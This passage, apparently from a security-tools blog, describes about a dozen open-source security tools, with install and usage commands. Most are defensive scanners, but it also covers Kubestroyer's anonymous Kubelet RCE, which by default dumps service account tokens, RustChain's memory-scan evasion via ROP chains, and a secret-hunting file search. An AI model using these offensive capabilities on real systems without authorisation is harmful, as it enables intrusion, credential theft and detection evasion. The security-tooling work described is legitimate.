• Moving all plugins into the plugins folder: Esstore, files, Cloud and GCP
• Fixing zero-division issues
• Migrating to the new major version of Elastic
• Changing the configuration in the CureIAM.yaml file
• Tested with Python 3.9.x

    Library Updates

Library versions are now pinned to avoid any backward-compatibility issues.

    • Elastic==8.7.0 # previously 7.17.9
    • elasticsearch==8.7.0
    • google-api-python-client==2.86.0
    • PyYAML==6.0
    • schedule==1.2.0
    • rich==13.3.5

    Docker Files

    • Adding Docker Compose for local Elastic and Kibana in elastic
• Adding .env-ex; change .env-ex to .env before running Docker
• Running docker compose: docker-compose -f docker_compose_es.yaml up

    Features

• Adding the capability to run a scan without applying the recommendations. By default, if mode_scan is false, mode_enforce won't run.
  mode_scan: true
  mode_enforce: false
• Turning off the email function temporarily.


MemTracer - Memory Scanner

    By: Zion3R


MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. MemTracer is implemented in Python and aims to detect reflectively loaded native .NET framework Dynamic-Link Libraries (DLLs). This is achieved by looking for the following abnormal memory region characteristics:

• The state of the memory page flags in each memory region. Specifically, the MEM_COMMIT flag, which indicates that physical storage has been allocated for the region's pages.
• The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
• The memory protection of the region. PAGE_READWRITE protection indicates that the memory region is readable and writable, which happens when the Assembly.Load(byte[]) method is used to load a module into memory.
• The memory region contains a PE header.

The tool starts by scanning the running processes and analyzing the characteristics of their allocated memory regions to detect reflective DLL loading symptoms. Suspicious memory regions identified as DLL modules are dumped for further analysis and investigation.
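To make these checks concrete, here is a minimal ctypes sketch (an illustration, not MemTracer's actual code) that walks a process's address space with VirtualQueryEx and flags regions matching the first three characteristics; a PE header check on the region's first bytes would complete the heuristic.

import ctypes
import ctypes.wintypes as wt

MEM_COMMIT = 0x1000
MEM_MAPPED = 0x40000
PAGE_READWRITE = 0x04

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", wt.DWORD),
        ("PartitionId", wt.WORD),
        ("RegionSize", ctypes.c_size_t),
        ("State", wt.DWORD),
        ("Protect", wt.DWORD),
        ("Type", wt.DWORD),
    ]

def suspicious_regions(process_handle):
    # Walk the address space and yield committed, mapped, read-write
    # regions, per the characteristics listed above. Windows x64 only.
    mbi = MEMORY_BASIC_INFORMATION()
    address = 0
    while ctypes.windll.kernel32.VirtualQueryEx(
            process_handle, ctypes.c_void_p(address),
            ctypes.byref(mbi), ctypes.sizeof(mbi)):
        if (mbi.State == MEM_COMMIT and mbi.Type == MEM_MAPPED
                and mbi.Protect == PAGE_READWRITE):
            yield (mbi.BaseAddress or 0), mbi.RegionSize
        address = (mbi.BaseAddress or 0) + mbi.RegionSize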
    Furthermore, the tool features the following options:

    • Dump the compromised process.
    • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
    • Search for specific loaded module by name.

    Example

python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Look for reflective DLL loading
-m MODULE, --module MODULE Look for a specific loaded DLL

The script needs administrator privileges in order to inspect all processes.



    DakshSCRA - Source Code Review Assist

    By: Zion3R


    Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

    Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

    What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


    Debut

    Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

    While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

    Features and Functionalities

Distinctive Features (Multiple World's Firsts)

• Identifies Areas of Interest in Source Code: Encourages focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

• Identifies Areas of Interest in File Paths (World's First): Recognises patterns in file paths to pinpoint relevant sections for review.

    • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

• Automated Scientific Effort Estimation for Code Review (World's First): Provides a measurable approach for estimating the effort required for a code review.

    Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

    Additionally, the tool offers the following functionalities:

• Options to use platform-specific rules for finding areas of interest
• Options to extend or add new rules for any new or existing languages
• Generates reports in text, HTML and PDF format for inspection

    Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

    Feel free to contribute towards updating or adding new rules and future development.

    If you find any bugs, report them to d3basis.m0hanty@gmail.com.

    Tool Setup

    Pre-requisites

    Python3 and all the libraries listed in requirements.txt

    Setting up environment to run this tool

    1. Setup a virtual environment

    $ pip install virtualenv

    $ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
    Example: virtualenv -p python3 venv

    $ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
    Example: source venv/bin/activate

    After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

    2. Ensure all required libraries are installed within the virtual environment

    You must run the below command after activating the virtual environment as mentioned in the previous steps.

    pip install -r requirements.txt

    Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

    Tool Usage

$ python3 dakshscra.py -h // To view available options and arguments

    usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

    options:
    -h, --help show this help message and exit
    -r RULE_FILE Specify platform specific rule name
    -f FILE_TYPES Specify file types to scan
    -v Specify verbosity level {'-v', '-vv', '-vvv'}
    -t TARGET_DIR Specify target directory path
    -l {R,RF}, --list {R,RF}
    List rules [R] OR rules and filetypes [RF]
    -recon Detects platform, framework and programming language used
    -estimate Estimate efforts required for code review

    Example Usage

    $ python3 dakshscra.py // To view tool usage along with examples

    Examples:
    # '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
    dakshsca.py -r php -t /source_dir_path

    # To override default settings, other filetypes can be specified with '-f' option.
    dakshsca.py -r php -f dotnet -t /path_to_source_dir
    dakshsca.py -r php -f custom -t /path_to_source_dir

    # Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
    dakshsca.py -recon -r php -t /path_to_source_dir

    # Perform only reconnaissance if '-recon' used without the '-r' option.
    dakshsca.py -recon -t /path_to_source_dir

    # Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
    dakshsca.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TYPES: dotnet, php, java, custom, allfiles

    Reports

    The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

    Scanning (Areas of Security Concerns) Report

    HTML Report:
    • DakshSCRA/reports/html/report.html
    PDF Report:
    • DakshSCRA/reports/html/report.pdf
    RAW TEXT Based Reports:
    • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
    • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
    • Identified Project Files: DakshSCRA/runtime/filepaths.txt

    Reconnaissance (Recon) Report

    • Reconnaissance Summary: /reports/text/recon.txt

    Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

    Code Review Effort Estimation Report

    • Effort estimation report: /reports/html/estimation.html

    Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

    Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



    VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

    By: Zion3R

    VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


    Features

    1. Directory-Based Scanning

    VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

    2. Detailed Scan Reports

    Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

    3. Hash-Based Checks

    VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

    4. VirusTotal Integration

    VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
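As an illustration of what such a lookup involves, here is a minimal sketch against the VirusTotal v3 files endpoint. It is not VTScanner's actual code, and the API key placeholder is hypothetical:

import hashlib

import requests

API_KEY = "YOUR_VT_API_KEY"  # hypothetical placeholder

def vt_lookup(path):
    # Hash the file locally, then query VirusTotal by digest.
    with open(path, "rb") as f:
        sha256 = hashlib.sha256(f.read()).hexdigest()
    resp = requests.get(
        f"https://www.virustotal.com/api/v3/files/{sha256}",
        headers={"x-apikey": API_KEY},
        timeout=30,
    )
    if resp.status_code == 404:
        return sha256, None  # unknown to VirusTotal: submit for analysis
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    return sha256, stats["malicious"]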

    5. Time Delay Functionality

    For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

    6. Premium API Support

    If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

    7. Interactive VirusTotal Exploration

    VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

    8. Preinstalled Windows Binaries

    For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

    9. Custom Binary Generation

    If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

    Installation

    Prerequisites

    Before installing VTScanner, make sure you have the following prerequisites in place:

• Python 3.6 installed on your system.
• The required libraries, installed with: pip install -r requirements.txt

    Download VTScanner

    You can acquire VTScanner by cloning the GitHub repository to your local machine:

    git clone https://github.com/samhaxr/VTScanner.git

    Usage

    To initiate VTScanner, follow these steps:

    cd VTScanner
    python3 VTScanner.py

    Configuration

    • Set the time delay between scan requests.
    • Enter your VirusTotal API key in config.ini

    License

    VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

    Disclaimer

    VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



    IMDShift - Automates Migration Process Of Workloads To IMDSv2 To Avoid SSRF Attacks

    By: Zion3R


AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration of all workloads to IMDSv2, which implements enhanced security measures to protect against these attacks.


    Features

    • Detection of AWS workloads that rely on the metadata endpoint amongst various services which includes - EC2, ECS, EKS, Lightsail, AutoScaling Groups, Sagemaker Notebooks, Beanstalk (in progress)
    • Simple and intuitive command-line interface for easy usage
• Automated migration of all workloads to IMDSv2 (a sketch of the underlying API call follows this list)
    • Standalone hop limit update for compatible resources
    • Standalone metadata endpoint enable operation for compatible resources
    • Detailed logging of migration process
    • Identify resources that are using IMDSv1, using the MetadataNoToken CloudWatch metric across specified regions
    • Built-in Service Control Policy (SCP) recommendations

    IMDShift vs. Metabadger

    Metabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.

    IMDShift makes several improvements on Metabadger's capabilities:

• IMDShift allows migration of individual services rather than blindly migrating all EC2 instances. For example, the user can choose to migrate only EKS workloads. Some services, such as Lightsail, do not fall under the EC2 umbrella, and IMDShift can migrate those resources as well.
• IMDShift allows standalone enabling of the metadata endpoint for resources where it is currently disabled, without having to perform migration on the remaining resources
• IMDShift allows standalone updates of the response hop limit for resources where the metadata endpoint is enabled, without having to perform migration on the remaining resources
• IMDShift allows not only including specific regions, but also skipping specified regions
• IMDShift supports not only AWS profiles, but can also assume roles
• IMDShift helps with post-migration activities by suggesting various Service Control Policies (SCPs) to implement.

    Installation

    Production Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install .

    Development Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install -e .

    Usage

    Options:
--services TEXT This flag specifies which services to scan for
IMDSv1 usage from [EC2, Sagemaker, ASG (Auto
Scaling Groups), Lightsail, ECS, EKS, Beanstalk].
Format: "--services EC2,Sagemaker,ASG"
--include-regions TEXT This flag explicitly specifies regions to
include in the scan for IMDSv1 usage. Format: "--
include-regions ap-south-1,ap-southeast-1"
    --exclude-regions TEXT This flag specifies regions to exclude from the
    scan explicitly. Format: "--exclude-regions ap-
    south-1,ap-southeast-1"
    --migrate This boolean flag enables IMDShift to perform
    the migration, defaults to "False". Format: "--
    migrate"
--update-hop-limit INTEGER This flag specifies if the hop limit should be
    updated and with what value. It is recommended
    to set the hop limit to "2" to enable containers
    to be able to work with the IMDS endpoint. If
    this flag is not passed, hop limit is not
    updated during migration. Format: "--update-hop-
    limit 3"
    --enable-imds This boolean flag enables IMDShift to enable the
    metadata endpoint for resources that have it
    disabled and then perform the migration,
    defaults to "False". Format: "--enable-imds"
    --profile TEXT This allows you to use any profile from your
    ~/.aws/credentials file. Format: "--profile
    prod-env"
--role-arn TEXT This flag lets you assume a role via aws sts.
    Format: "--role-arn
    arn:aws:sts::111111111:role/John"
    --print-scps This boolean flag prints Service Control
    Policies (SCPs) that can be used to control IMDS
    usage, like deny access for credentials fetched
    from IMDSv2 or deny creation of resources with
    IMDSv1, defaults to "False". Format: "--print-
    scps"
    --check-imds-usage This boolean flag launches a scan to identify
    how many instances are using IMDSv1 in specified
    regions, during the last 30 days, by using the
    "MetadataNoToken" CloudWatch metric, defaults to
    "False". Format: "--check-imds-usage"
    --help Show this message and exit.


    Golddigger - Search Files For Gold

    By: Zion3R


Gold Digger is a simple tool to help quickly discover sensitive information in files recursively. It was originally written to assist in rapidly searching through files obtained during a penetration test.


    Installation

    Gold Digger requires Python3.

    virtualenv -p python3 .
    source bin/activate
    python dig.py --help

    Usage

    usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

    optional arguments:
    -h, --help show this help message and exit
    -e EXCLUDE, --exclude EXCLUDE
    JSON file containing extension exclusions
    -g GOLD, --gold GOLD JSON file containing the gold to search for
    -d DIRECTORY, --directory DIRECTORY
    Directory to search for gold
    -r RECURSIVE, --recursive RECURSIVE
    Search directory recursively?
    -l LOG, --log LOG Log file to save output

    Example Usage

    Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.

    An example structure could be:

    ~/Engagements/CustomerName/data/randomfiles/
    ~/Engagements/CustomerName/data/randomfiles2/
    ~/Engagements/CustomerName/data/code/

You would provide the following command to parse all three directories:

    python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
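Conceptually, the scan is a recursive walk that applies every pattern to each non-excluded file. Here is a minimal sketch of the idea (not Gold Digger's actual code; the JSON shapes noted in the comments are assumptions):

import json
import os
import re

def dig(directory, gold_file, exclude_file):
    with open(gold_file) as f:
        gold = json.load(f)  # assumed shape: {"label": "regex", ...}
    with open(exclude_file) as f:
        excluded = set(json.load(f))  # assumed shape: [".png", ".jpg", ...]
    for root, _dirs, files in os.walk(directory):
        for name in files:
            # Skip files whose extension is in the exclusion list.
            if os.path.splitext(name)[1].lower() in excluded:
                continue
            path = os.path.join(root, name)
            try:
                with open(path, errors="ignore") as f:
                    text = f.read()
            except OSError:
                continue
            for label, pattern in gold.items():
                for match in re.finditer(pattern, text):
                    print(f"{path}: {label}: {match.group(0)}")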

    Results

The tool will create a log file containing the scanning results. Due to the nature of regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

    Shout-outs

    Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



    Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

    By: Zion3R


    A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

    The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

    Artemis is experimental software, under active development - use at your own risk.

    Features

    For an up-to-date list of features, please refer to the documentation.

    Development

    Tests

    To run the tests, use:

    ./scripts/test

    Code formatting

    Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

    To run it locally, use:

    pre-commit run --all-files

    To setup pre-commit so that it runs before each commit, use:

    pre-commit install

    Building the docs

    To build the documentation, use:

    cd docs
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    make html

    How do I write my own module?

    Please refer to the documentation.

    Contributing

    Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

    However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



    Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

    By: Zion3R


This tool is very helpful for finding vulnerabilities present in web applications.

• A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generating malicious inputs and evaluating the application's responses.
  • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
  • This scanner uses tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc. in order to scan ports, sites, hosts and networks to find vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

    Tools Used

    Serial No. Tool Name Serial No. Tool Name
    1 whatweb 2 nmap
    3 golismero 4 host
    5 wget 6 uniscan
    7 wafw00f 8 dirb
    9 davtest 10 theharvester
    11 xsser 12 fierce
    13 dnswalk 14 dnsrecon
    15 dnsenum 16 dnsmap
    17 dmitry 18 nikto
    19 whois 20 lbd
    21 wapiti 22 devtest
    23 sslyze

    Working

    Phase 1

• The user has to write: "python3 web_scan.py (https or http) ://example.com"
• At first the program will note the initial run time, then it will build the URL with "www.example.com".
• After this step the system will check the internet connection using ping.
• Functionalities:
  • To navigate to the help menu, use --help; to update, use --update
  • If the user wants to skip the current scan/test: CTRL+C
  • To quit the scanner: CTRL+Z
  • The program will report the scanning time taken by the tool for each specific test.

    Phase 2

• From here the main function of the scanner starts:
• The scanner will automatically select a tool to start scanning.
• Scanners that will be used and filename rotation (default: enabled)
• The command used to initiate each tool (with parameters and extra params) is already given in the code
• After finding a vulnerability in the web application, the scanner will classify it in a specific format:
  • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
  • Here c (critical) denotes the most severe finding, whereas l (low) denotes the least vulnerable system

    Definitions:-

• Critical: Vulnerabilities that score in the critical range usually have most of the following characteristics: exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

• High: An attacker can fully compromise the confidentiality, integrity or availability of a target system without specialized access, user interaction or circumstances that are beyond the attacker's control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in significant data loss or downtime.

• Medium: An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

• Low: An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

    • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

    • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
      0.1 - 3.9 Low
      4.0 - 6.9 Medium
      7.0 - 8.9 High
      9.0 - 10.0 Critical

    Vulnerabilities

• After this the scanner will show results, which include:
      • Response time
      • Total time for scanning
      • Class of vulnerability

    Remediation

• Now, the scanner reports the harmful effects of that specific type of vulnerability.
• The scanner lists sources (websites) to learn more about the vulnerabilities.
• After this step, the scanner suggests some remedies to address the vulnerabilities.

    Phase 3

    • Scanner will Generate a proper report including
      • Total number of vulnerabilities scanned
      • Total number of vulnerabilities skipped
      • Total number of vulnerabilities detected
      • Time taken for total scan
  • Details about each and every vulnerability.
• Writes all scan file output into SA-Debug-ScanLog for debugging purposes under the same directory
• For debugging purposes, you can view the complete output generated by all the tools in SA-Debug-ScanLog.

    Use

    Use Program as python3 web_scan.py (https or http) ://example.com
    --help
    --update
    Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
    1 IPv6 2 Wordpress
    3 SiteMap/Robot.txt 4 Firewall
    5 Slowloris Denial of Service 6 HEARTBLEED
    7 POODLE 8 OpenSSL CCS Injection
    9 FREAK 10 Firewall
    11 LOGJAM 12 FTP Service
    13 STUXNET 14 Telnet Service
    15 LOG4j 16 Stress Tests
    17 WebDAV 18 LFI, RFI or RCE.
    19 XSS, SQLi, BSQL 20 XSS Header not present
    21 Shellshock Bug 22 Leaks Internal IP
    23 HTTP PUT DEL Methods 24 MS10-070
    25 Outdated 26 CGI Directories
    27 Interesting Files 28 Injectable Paths
    29 Subdomains 30 MS-SQL DB Service
    31 ORACLE DB Service 32 MySQL DB Service
    33 RDP Server over UDP and TCP 34 SNMP Service
    35 Elmah 36 SMB Ports over TCP and UDP
    37 IIS WebDAV 38 X-XSS Protection

    Installation

    git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
    cd Scanner-and-Patcher/setup
    python3 -m pip install --no-cache-dir -r requirements.txt

    Screenshots of Scanner

    Contributions

    Template contributions , Feature Requests and Bug Reports are more than welcome.

    Authors

    GitHub: @Malwareman007
    GitHub: @Riya73
GitHub: @nano-bot01

    Contributing

    Contributions, issues and feature requests are welcome!
    Feel free to check issues page.



    Kubestroyer - Kubernetes Exploitation Tool

    By: Zion3R

    Kubestroyer

Kubestroyer aims to exploit Kubernetes cluster misconfigurations and to be the Swiss Army knife of your Kubernetes pentests


    About The Project

Kubestroyer is a Golang exploitation tool that aims to take advantage of Kubernetes cluster misconfigurations.

The tool scans for known Kubernetes ports that can be exposed, and exploits them.
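The scanning half of that idea fits in a few lines of Python; the sketch below probes a small, illustrative subset of commonly exposed Kubernetes ports (Kubestroyer itself is written in Go and covers more):

import socket

# Commonly exposed Kubernetes ports (illustrative subset).
KNOWN_PORTS = {
    2379: "etcd client API",
    6443: "kube-apiserver (HTTPS)",
    8080: "kube-apiserver (insecure)",
    10250: "kubelet API",
    10255: "kubelet read-only API",
}

def scan(host):
    for port, description in KNOWN_PORTS.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)
            if s.connect_ex((host, port)) == 0:
                print(f"{host}:{port} open - {description}")

scan("localhost")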

    Getting Started

    To get a local copy up and running, follow these simple example steps.

    Prerequisites

    • Go 1.19
      wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
      tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz

    Installation

    Use prebuilt binary

    or

    Using go install command :

    $ go install github.com/Rolix44/Kubestroyer@latest

    or

    build from source:

    1. Clone the repo
      $ git clone https://github.com/Rolix44/Kubestroyer.git
    2. build the binary
      $ go build -o Kubestroyer cmd/kubestroyer/main.go 

    Usage

Parameter Description Mand/opt Example
-t / --target Target (IP, domain or file) Mandatory -t localhost,127.0.0.1 / -t ./domain.txt
--node-scan Enable node port scanning (port 30000 to 32767) Optional -t localhost --node-scan
--anon-rce RCE using Kubelet API anonymous auth Optional -t localhost --anon-rce
-x Command to execute when using RCE (displays the service account token by default) Optional -t localhost --anon-rce -x "ls -al"

    Currently supported features

    • Target

      • List of multiple targets
      • Input file as target
    • Scanning

      • Known ports scan
      • Node port scan (30000 to 32767)
      • Port description
    • Vulnerabilities

• Anon RCE on Kubelet
        • Choose command to execute

    Roadmap

    • Choose the pod for anon RCE
    • Etcd exploit
    • Kubelet read-only API parsing for information disclosure

    See the open issues for a full list of proposed features (and known issues).

    Contributing

    Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

    If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

    1. Fork the Project
    2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
    3. Commit your Changes (git commit -m 'Add some AmazingFeature')
    4. Push to the Branch (git push origin feature/AmazingFeature)
    5. Open a Pull Request

    License

    Distributed under the MIT License. See LICENSE.txt for more information.

    Contact

    Rolix - @Rolix_cy - rolixcy@protonmail.com

    Project Link: https://github.com/Rolix44/Kubestroyer



    Burp-Dom-Scanner - Burp Suite's Extension To Scan And Crawl Single Page Applications

    By: Zion3R


    It's a Burp Suite's extension to allow for recursive crawling and scanning of Single Page Applications.
    It runs a Chromium browser to scan the webpage for DOM-based XSS.
    It can also collect all the requests (XHR, fetch, websockets, etc) issued during the crawling allowing them to be forwarded to Burp's Proxy, Repeater and Intruder.

    It requires node and DOMDig.


    Download

    Latest release can be downloaded here

    Installation

    1. Install node
    2. Install DOMDig
    3. Download and load the extension
    4. Set both the path of node's executable and the path of domdig.js in the extension's UI.

    Scanning Engine

    Burp DOM Scanner uses DOMDig as the crawling and scanning engine.

    DOMDig

DOMDig is a DOM XSS scanner that runs inside the Chromium web browser and can scan single page applications (SPAs) recursively. Unlike other scanners, DOMDig can crawl any web application (including gmail) by keeping track of DOM modifications and XHR/fetch/websocket requests, and it can simulate real user interaction by firing events. During this process, XSS payloads are put into input fields and their execution is tracked in order to find injection points and the related URL modifications.

    Usage and Details

    Details about usage, performed checks and reported vulnerabilities, can be found at DOMDig's page



    RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

    By: Zion3R


    This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.

The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the previously set exception filter function is triggered, allowing us to call the ROP chain without using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well-known dlls.

    The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


    The overview of the process is as follows:

    • We use SetUnhandledExceptionFilter to set a new exception filter function.
    • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
    • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
    • The ROP chain is called from the exception filter function, allowing to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and the normal execution continues.

    This process repeats indefinitely.

As can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.

    Compilation

    Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

    C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

    After that, simply compile the code and run the tool:

    C:\Users\User\Desktop\RustChain> cargo build
    C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

    Limitations

    This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

    Credits



    Kubei - A Flexible Kubernetes Runtime Scanner


Kubei is a vulnerability scanning tool that gives users an accurate and immediate risk assessment of their Kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods. It doesn't scan the entire image registries and doesn't require preliminary integration with CI/CD pipelines.
It is a configurable tool which allows users to define the scope of the scan (target namespaces), the speed, and the vulnerability level of interest.
It provides a graphical UI which allows the viewer to identify where and what should be replaced in order to mitigate the discovered vulnerabilities.

    Prerequisites
